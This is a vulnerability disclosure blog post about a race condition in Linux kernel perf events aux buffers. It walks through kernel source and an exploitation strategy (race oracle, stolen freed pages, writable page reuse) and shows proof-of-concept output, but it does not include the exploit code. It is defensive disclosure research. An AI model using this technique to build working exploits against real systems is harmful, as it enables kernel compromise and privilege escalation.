Race conditions in Linux Kernel perf events

Foreword;

We disclosed this vulnerability to the kernel security team through responsible disclosure.
The patch on the mailing list is visible here.

We are publishing the vulnerability to demonstrate that it is fully exploitable and to ensure that the technical details are available.

No CVE number has been assigned yet, as per the kernel teams policy CVEs are only issued once a fix is available and rolled out.
We will retroactively add that information when it becomes available.

The vulnerability seems to have been introduced in the 4.1 kernel, when aux buffers were added to perf events. This makes it roughly 9 years old.
The proof of concept (PoC) in this blog post was only tested on 6.x kernel versions, but should be transferrable to older kernel versions as well.

We will demonstrate that the vulnerability is exploitable on a pre-patch vanilla kernel.
However, the exploit strategy described in this blog post does not work on any major distributions.

In particular as long as check_pages_enabled is true, the exploit strategy laid out in this blog post will not work.
This is the case if init_on_alloc, page poisoning, init_on_free, CONFIG_DEBUG_PAGEALLOC or CONFIG_DEBUG_VM are enabled.

The vulnerability itself does affect major distributions, but we are not publishing a blueprint for how to perform that exploit.

Debian-based distributions, as well as Android and any virtual machines are not affected.

The rest of this blog post concerns the technical details of the bug and how to exploit it.

What are perf events?

perf_events is a kernel subsystem intended for performance measurement of various aspects of a system.
struct perf_event objects can be created with the perf_event_open syscall. Each type of event is provided by a PMU (performance measurement unit).

The struct perf_event is returned to the user mode process as a file descriptor.

Each event can have an associated struct perf_buffer ringbuffer, which is called rb on the event struct. This ringbuffer can either be created by mmaping an event that doesn’t currently have an rb, or a different events ringbuffer can be assigned to rb through the PERF_EVENT_IOC_SET_OUTPUT ioctl.

perf_buffer struct

The struct perf_buffer data structure is used to keep track of the memory of a buffer as well as multiple counters.
perf_buffer, ring buffer  and rb are used interchangeably throughout the writeup

Source

struct perf_buffer {
    refcount_t            refcount;
    /*[...] Snip for length*/
    int                nr_pages;    /* nr of data pages  */
    /*[...] Snip for length*/
    /* poll crap */
    spinlock_t            event_lock;
    struct list_head        event_list;

    atomic_t            mmap_count;
    unsigned long            mmap_locked;
    struct user_struct        *mmap_user;

    /* AUX area */
    /*[...] Snip for length*/
    unsigned long            aux_pgoff;
    int                aux_nr_pages;
    int                aux_overwrite;
    atomic_t            aux_mmap_count;
    /*[...] Snip for length*/
    refcount_t            aux_refcount;
    int                aux_in_sampling;
    void                **aux_pages;
    void                *aux_priv;

    struct perf_event_mmap_page    *user_page;
    void                *data_pages[];
};

Most of the fields are self explanatory, so we will just give brief additional information on the ones that are relevant for this post.

      • mmap_count keeps track of how many vmas map an event that has this buffer.

      • aux_nr_pages is also used to check if perf_buffer has an aux buffer.

      • aux_mmap_count keeps track of how many vmas map an event that has this aux buffer.

      • user_page points to a special page that the user space can write to, to communicate ring buffer state and configuration.

    Creating a ring buffer

    To create an rb on an event, the event must be mmaped.
    The mmap call is then executing perf_mmap, which will perform some checks on the arguments and if those pass, it will eventually call rb_alloc.

    Specifically we need that pg_off==0 and that the number of pages we are asking for is one page larger than a power of two.

    It should be noted that the vma is a mapping of the struct perf_event and not of the struct perf_buffer

    The mapped memory starts with the mapping of the user_page and is followed by the data pages.

    If an rb already exists, a new struct perf_buffer is not created and the rb->mmap_count is incremented instead.
    This mmap_count variable keeps track of how many vmas exist that reference this ring buffer and once it reaches zero the ring buffer will drop a reference and will likely be freed.

    Aux buffers

    For some PMUs, ring buffers can have an additional aux auxilliary buffer. The aux buffer information is embedded in the perf_buffer struct.
    The aux fields of the rb are prefixed with aux_ to distinguish them.

    To create an aux buffer, its parameters must first be configured using the user_page (namely aux_offset and aux_size) and can then be mmaped with the configured offset and size.

    There are additional checks in place to make sure the aux buffer and the original buffer don’t overlap.
    If all checks pass, the aux buffer values are set up by rb_alloc_aux.

    What can you do with a perf_event and ringbuffers

    A perf_event fd has the following interactions with ringbuffers.

        • mmap
              • Create a perf_buffer rb if the event doesn’t have an rb already and pgoff==0

              • Map an existing perf_buffer rb if the event already has an rb and the mmap request matches it.

              • Create an aux buffer for the rb if the user_page has set it up and pgoff matches the configured aux_offset.

              • Map an existing aux buffer, if the rb already has an aux buffer and the mmap request matches it.

          • ioctl
                • Assign another events perf_buffer to self, if own event->mmap_count is 0.

          event->mmap_mutex

          The vma stores a reference to a struct perf_event, which in turn points to a struct perf_buffer which is called rb in the code below.
          When the vma is closed the function perf_mmap_close is called.

          In it the code keeps track of what has been closed and adjusts the appropriate counters.
          Below is an excerpt of how aux buffers are handled.

          Source

              if (rb_has_aux(rb) && vma->vm_pgoff == rb->aux_pgoff &&
                  atomic_dec_and_mutex_lock(&rb->aux_mmap_count, &event->mmap_mutex)) {
                  /*[...] Snip for length */
          
                  /* this has to be the last one */
                  rb_free_aux(rb);
                  WARN_ON_ONCE(refcount_read(&rb->aux_refcount));
          
                  mutex_unlock(&event->mmap_mutex);
              }
          

          rb_has_aux(rb) simply checks if rb->aux_nr_pages != 0.
          Then, if vma->vm_pgoff == rb->aux_pgoff, the rb->aux_mmap_countis decremented and theevent->mmap_mutex` lock is taken if it reached 0.

          While the lock is taken, some counters are adjusted and eventually rb_free_aux is called, which will free all of the memory associated with the aux buffer.

          The issue

          The problem is that the lock that is taken is on event rather than rb.

          Since multiple events can point to the same struct perf_buffer the event->mmap_mutex does not actually prevent concurrent accesses to the rb.

          In the case of the rb itself this turns out not to be an issue because you can only forward to a buffer that already exists. But this is not the case for the aux buffer.

          What can we do with it

          To get an idea of how we can use this issue to our advantage, let’s take a closer look at perf_mmap. I’ll provide multiple code snippets to walk you through the logic.

          Source

          static int perf_mmap(struct file *file, struct vm_area_struct *vma)
          {
              struct perf_event *event = file->private_data;
              unsigned long user_locked, user_lock_limit;
              struct user_struct *user = current_user();
              struct perf_buffer *rb = NULL;
              /* [...] Snip for length*/
          
              vma_size = vma->vm_end - vma->vm_start;
          
              if (vma->vm_pgoff == 0) {
                  nr_pages = (vma_size / PAGE_SIZE) - 1;
              } else {
                  /*
                   * AUX area mapping: if rb->aux_nr_pages != 0, it's already
                   * mapped, all subsequent mappings should have the same size
                   * and offset. Must be above the normal perf buffer.
                   */
                  u64 aux_offset, aux_size;
          
                  if (!event->rb)
                      return -EINVAL;
          

          If the requested vm_pgoff isn’t 0 we assume that it’s a request for an aux buffer. We can only create an aux buffer if an rb already exists.

                  nr_pages = vma_size / PAGE_SIZE;
          
                  mutex_lock(&event->mmap_mutex);
                  ret = -EINVAL;
          
                  rb = event->rb;
                  if (!rb)
                      goto aux_unlock;
          

          We calculate the number of pages and then take the event->mmap_mutex lock. Afterwards we check if the event still has an rb. We then assign to the local rb variable, this is important for a case distinction later in the code.

                  aux_offset = READ_ONCE(rb->user_page->aux_offset);
                  aux_size = READ_ONCE(rb->user_page->aux_size);
          
                  if (aux_offset < perf_data_size(rb) + PAGE_SIZE)
                      goto aux_unlock;
          

          We get the configured parameters from the user page and we check that the configured offset is actually behind the already existing buffer.

              /*[...] Snipped a bunch of mundance checks on the pg_off and size*/
          
                  if (!atomic_inc_not_zero(&rb->mmap_count))
                      goto aux_unlock;
          
                  if (rb_has_aux(rb)) {
                      atomic_inc(&rb->aux_mmap_count);
                      ret = 0;
                      goto unlock;
                  }
          

          We increment the rb->mmap_count and if there already is an aux buffer we increment rb->aux_mmap_count and return.

                  atomic_set(&rb->aux_mmap_count, 1);
                  user_extra = nr_pages;
          
                  goto accounting;
              }
          

          If there isn’t an aux buffer already we set rb->aux_mmap_count to 1 and jump forward.

              /*[...]Snip rb stuff before accounting label*/
          accounting:
              /*[...]Snip a bunch of rlimit checking to make sure we are allowed to reserve that amount of memory*/
          
              if (!rb) {
              /*[...] Snip rb setup code*/
              } else {
                  ret = rb_alloc_aux(rb, event, vma->vm_pgoff, nr_pages,
                             event->attr.aux_watermark, flags);
                  if (!ret)
                      rb->aux_mmap_locked = extra;
              }
          

          This is the case distinction mentioned earlier.
          Because the local rb variable is set, we are calling rb_alloc_aux to create an aux buffer.

          The rest of the function just increments event->mmap_count and sets up the vma flags and vm_ops.

          Because all of this is protected by the event->mmap_lock we can execute it concurrently.

          Getting an “orphaned” aux vma

          Our first goal is to get a vma that has the correct size and pgoff to be an aux buffer, while aux_nr_pages is zero.

          Note that we can’t do the race in the same process, since the mm->lock is held during mmap.
          But we can simply fork into a new process and race from there.

          If we mmap an existing aux buffer it will just increment rb->aux_mmap_count and succeed. The way that perf_mmap checks if there already is an aux buffer is by checking if aux_nr_pages is not zero.

          If we take a quick look at __rb_free_aux it goes through all pages and frees them and only sets aux_nr_pages to zero at the very end.

          Source

          static void __rb_free_aux(struct perf_buffer *rb)
          {
              /*[...] Snip for length*/
          
              if (rb->aux_nr_pages) {
                  for (pg = 0; pg < rb->aux_nr_pages; pg++)
                      rb_free_aux_page(rb, pg);
          
                  kfree(rb->aux_pages);
                  rb->aux_nr_pages = 0;
              }
          }
          

          Because it goes through all of the pages first, we can make the time that __rb_free_aux is in flight almost arbitrarily large.

          That means that we can race perf_mmap_close of the aux buffer against perf_mmap.

          If perf_mmap_close reduces rb->aux_mmap_count to 0 it will call __rb_free_aux. But perf_mmap doesn’t check if rb->aux_mmap_count is zero and will just increment the refcount as long as rb->aux_nr_pages is not zero.

          If we win the race we will have a vma with an aux buffer pgoff, even though rb->aux_nr_pages has been set to 0.

          Race Oracle

          With a little bit of trickery we can determine if we were too early or too late or if we just won the race.

          To do this we need the following setup:

              • event1
                    • supports aux

                    • already has an rb

                    • already has an aux buffer

                • event2
                      • does not support aux

                      • forwarded to event1s rb

                We will race the mmap of event2 against the munmap of the aux buffer of event1.

                If we are too early, then event2 increments rb->aux_mmap_count before perf_mmap_close decrements it, so the aux buffer is never freed. So our mmap succeeds. If we are too late, then rb->aux_nr_pages was already 0 and event2 will try to create an aux buffer and mmap will fail with -EOPNOTSUPP. If we win the race, then our mmap succeeds just like in the too early case, but if we try to access any of the memory in the vma we will get a SIGBUS since the aux buffer isn’t backed by memory.

                So our oracle works like this:
                If mmap fails, we were too late.
                If mmap succeeds, we wait a little bit, to make sure that __rb_free_aux has finished running.
                If we then try to access the mapped vmas memory and it succeeds we were too early.
                But if it fails with SIGBUS we won the race.

                Because we have an oracle we can very reliably find the correct timing for the race condition.

                What do we gain from the “orphaned” vma?

                Let’s first take a quick look at perf_mmap_fault. This is the fault handler that is responsible for handling page faults in the perf_event vmas.

                Source

                static vm_fault_t perf_mmap_fault(struct vm_fault *vmf)
                {
                    struct perf_event *event = vmf->vma->vm_file->private_data;
                    struct perf_buffer *rb;
                    vm_fault_t ret = VM_FAULT_SIGBUS;
                
                    /*[...] Snip some code related to write protecting vma pages*/
                
                    vmf->page = perf_mmap_to_page(rb, vmf->pgoff);
                    if (!vmf->page)
                        goto unlock;
                
                    get_page(vmf->page);
                    vmf->page->mapping = vmf->vma->vm_file->f_mapping;
                    vmf->page->index   = vmf->pgoff;
                
                    ret = 0;
                    /*[...]Snip rcu_unlock*/
                    return ret;
                }
                

                The page fault handler basically looks up the associated page of the buffer and then inserts it into the vma. You may have noticed that it doesn’t take any locks associated with the rb.

                Here is the perf_mmap_to_page function.

                Source

                struct page *
                perf_mmap_to_page(struct perf_buffer *rb, unsigned long pgoff)
                {
                    if (rb->aux_nr_pages) {
                        /* above AUX space */
                        if (pgoff > rb->aux_pgoff + rb->aux_nr_pages)
                            return NULL;
                
                        /* AUX space */
                        if (pgoff >= rb->aux_pgoff) {
                            int aux_pgoff = array_index_nospec(pgoff - rb->aux_pgoff, rb->aux_nr_pages);
                            return virt_to_page(rb->aux_pages[aux_pgoff]);
                        }
                    }
                
                    return __perf_mmap_to_page(rb, pgoff);
                }
                

                You can see that as long as rb->aux_nr_pages isn’t zero, we can still access the aux buffer pages.
                In particular we can still fault pages into our vma while (or even after) __rb_free_aux is returning them to the page allocator,

                This wouldn’t normally be a problem, since we can’t fault in aux buffer pages if we don’t have a vma that corresponds to the aux buffer. And the aux buffer should only be freed if rb->aux_mmap_count becomes zero.

                But because of our orphaned aux buffer vma we now have a vma that has the correct pgoff to access the aux buffer but isn’t accounted for by rb->aux_mmap_count.

                (Well, it technically is accounted for at this stage. But as soon as we create a new aux buffer – which we can do because aux_nr_pages is zero – it will set aux_mmap_count back to 1, making the orphaned vma unaccounted for.)

                Stealing pages

                By racing against the freeing of the pages we are able to get several pages mapped in our process that have already been returned to the page allocator. This means we already have a page reuse primitive at this stage. The problem is that we aren’t allowed to write to any of the pages in an aux buffer.

                But since we are allowed to write to the user page, we can spray struct event_buffer with just one page – the user page.
                We already know that it is available, since we used it earlier and it has the same allocation flags as the aux buffer page allocation, so it is likely that we will receive (at least some of) the same pages that were just returned to the page allocator.
                The pages that get returned will be initialized and will have their refcount reset to 1.

                The spray is very nice, because we can simply fill each freshly allocated user page with data and then scan all of the “stolen” pages to work out if we found a match and which stolen page it corresponds to.
                And we can repeat this process as often as needed.

                Once we have found enough pages, we then remove them from the readonly orphaned aux buffer mapping and can unmap the user page in our spray with madvise MADV_DONTNEED.
                Using madvise let’s us remove the page from the vma mapping without closing the vma.
                This will drop the refcount of the page back to zero because it was reset to 1 when it was allocated for our user page.

                Because the refcount dropped to zero, the page is returned to the page allocator once again – even though we still have a reference to it – but this time it is writable.

                At this stage we have a writable page reuse primitive.
                We can now spray kernel objects and if they end up in our page we have full control over them.
                The rest of the exploit is neither interesting nor specific to this vulnerability, so we will stop here.

                Why it doesn’t work on most distros

                On most (or even all) distributions this strategy doesn’t work. If check_pages_enabled is true the page allocator will perform several sanity checks for every page it returns. And the pages that we “stole” have a non-zero refcount.

                This is what that looks like:

                Aug 05 11:59:33 archlinux kernel: BUG: Bad page map in process exploit  pte:8000000378b4f025 pmd:3bb7ff067
                Aug 05 11:59:33 archlinux kernel: page: refcount:1 mapcount:-1 mapping:00000000dbe5efca index:0x751 pfn:0x378b4f
                Aug 05 11:59:33 archlinux kernel: aops:anon_aops.0 ino:836 dentry name:"inotify"
                Aug 05 11:59:33 archlinux kernel: flags: 0x2ffff8000000004(referenced|node=0|zone=2|lastcpupid=0x1ffff)
                Aug 05 11:59:33 archlinux kernel: raw: 02ffff8000000004 dead000000000100 dead000000000122 ffff975cc0585d50
                Aug 05 11:59:33 archlinux kernel: raw: 0000000000000751 0000000000000000 00000001fffffffe 0000000000000000
                Aug 05 11:59:33 archlinux kernel: page dumped because: bad pte
                

                In that case the page allocator will skip over any pages that don’t pass the sanity checks, so the stolen pages will never be returned by the page allocator for any allocation.

                It is possible to get around this in a scenario where another process allocates the page in the time window between the page being returned by __rb_free_aux and us stealing the page. But in that case the refcount never becomes zero, so we can not perform the pivot to a writable mapping. Making it most likely only a KASLR bypass.

                Demo

                But on a fresh vanilla kernel compiled with a default config these checks are not enabled.

                Below you can see the output of our proof of concept.

                / # /mnt/host/exploit
                [+] Opening event fd
                [+] Found aux mappable pmu: t=1, c=2
                [+] Opened event fds
                [+] redirected event2->event1
                [P] Started
                [C] Started
                [C] Won stage 1 race
                [C] Unmap Fault Started
                [P] Unmap Started
                [C] Won stage 2 race
                [C] Caught sigbus, correcting offset
                [P] Starting the spray
                [C] Scanning 2339 pages, range 0x7fcb1d263000-0x7fcb1db86000
                [C] Unmapping readable pages with writable counterpart
                [P] Found 33 writable page(s) in 49 iterations
                [C] Spinning
                [P] Doing refcount manipulation
                [P] Checking for change and spraying
                [P] Writable page changed
                dump@0x7fcb1db46000
                dump: +0000: 0000000000000000000000000000000010FFFF42FFFFFFFF10FFFF42FFFFFFFF000000000000000028FFFF42FFFFFFFF28FFFF42FFFFFFFF0000000000000000
                dump: +0040: 40FFFF42FFFFFFFF40FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
                dump: +0080: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
                dump: +00c0: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
                dump: +0100: 00FFFF42FFFFFFFF00FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
                dump: +0140: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
                dump: +0180: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
                dump: +01c0: FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
                dump: +0200: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
                dump: +0240: 0000000000000000000000000000000050FFFF42FFFFFFFF50FFFF42FFFFFFFF000000000000000068FFFF42FFFFFFFF68FFFF42FFFFFFFF0000000000000000
                dump: +0280: FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
                dump: +02c0: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
                dump: +0300: 0000000000000000000000000000000010FFFF42FFFFFFFF10FFFF42FFFFFFFF000000000000000028FFFF42FFFFFFFF28FFFF42FFFFFFFF0000000000000000
                dump: +0340: 40FFFF42FFFFFFFF40FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
                dump: +0380: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
                dump: +03c0: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
                [P] Main thread done
                [P] Spinning
                

                Try it yourself

                The PoC described in this blog post can be found here.

                If you plan to experiment with this bug it is HIGHLY recommended to patch the kernel so that you can do so in a virtual machine. You will most likely completely freeze the kernel if anything goes wrong with your exploit.
                Your virtual machine should have at least 2 CPU cores, so that the race can happen concurrently.

                Written by Nils Ole Timm, @Firzen14
                Linux Team Security Researcher
                Binary Gecko GmbH

                See More Blog Posts

                In this blog post we’ll dive into the details of an interesting vulnerability in the new IPC mechanism of Chrome, ipcz, and see how it was possible to exploit it from a compromised renderer to escape the Chrome sandbox. The following analysis and described exploitation technique is based on Chromium